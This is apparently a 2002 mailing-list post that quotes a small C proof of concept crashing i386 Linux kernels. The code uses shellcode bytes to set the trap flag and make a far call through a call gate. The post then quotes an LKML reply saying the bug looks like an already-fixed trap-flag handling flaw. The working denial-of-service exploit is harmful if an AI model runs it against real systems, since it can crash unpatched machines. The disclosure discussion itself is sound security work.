Christophe Devine writes:
> /* USE AT YOUR OWN RISK ! */
>
> int main( void )
> {
>     char dos[] = "\x9C" /* pushfd */
>                  "\x58" /* pop eax */
>                  "\x0D\x00\x01\x00\x00" /* or eax,100h */
>                  "\x50" /* push eax */
>                  "\x9D" /* popfd */
>                  "\x9A\x00\x00\x00\x00\x07\x00"; /* call 07h:00h */
>
>     void (* f)( void );
>
>     f = (void *) dos; (* f)();
>
>     return 1;
> }

You didn't specify which kernel this was being used against, but
this is what the response from LKML is:

> -----Original Message-----
> From: Alan Cox
> Sent: Tuesday, November 12, 2002 3:10 PM
> To: Christoph Hellwig
> Cc: Leif Sawyer; Linux Kernel Mailing List
> Subject: Re: FW: i386 Linux kernel DoS
>
>
> On Tue, 2002-11-12 at 23:31, Christoph Hellwig wrote:
> > On Tue, Nov 12, 2002 at 02:28:55PM -0900, Leif Sawyer wrote:
> > > This was posted on bugtraq today...
> >
> > A real segfaulting program? wow :)
>
> Looks like the TF handling bug which was fixed a while ago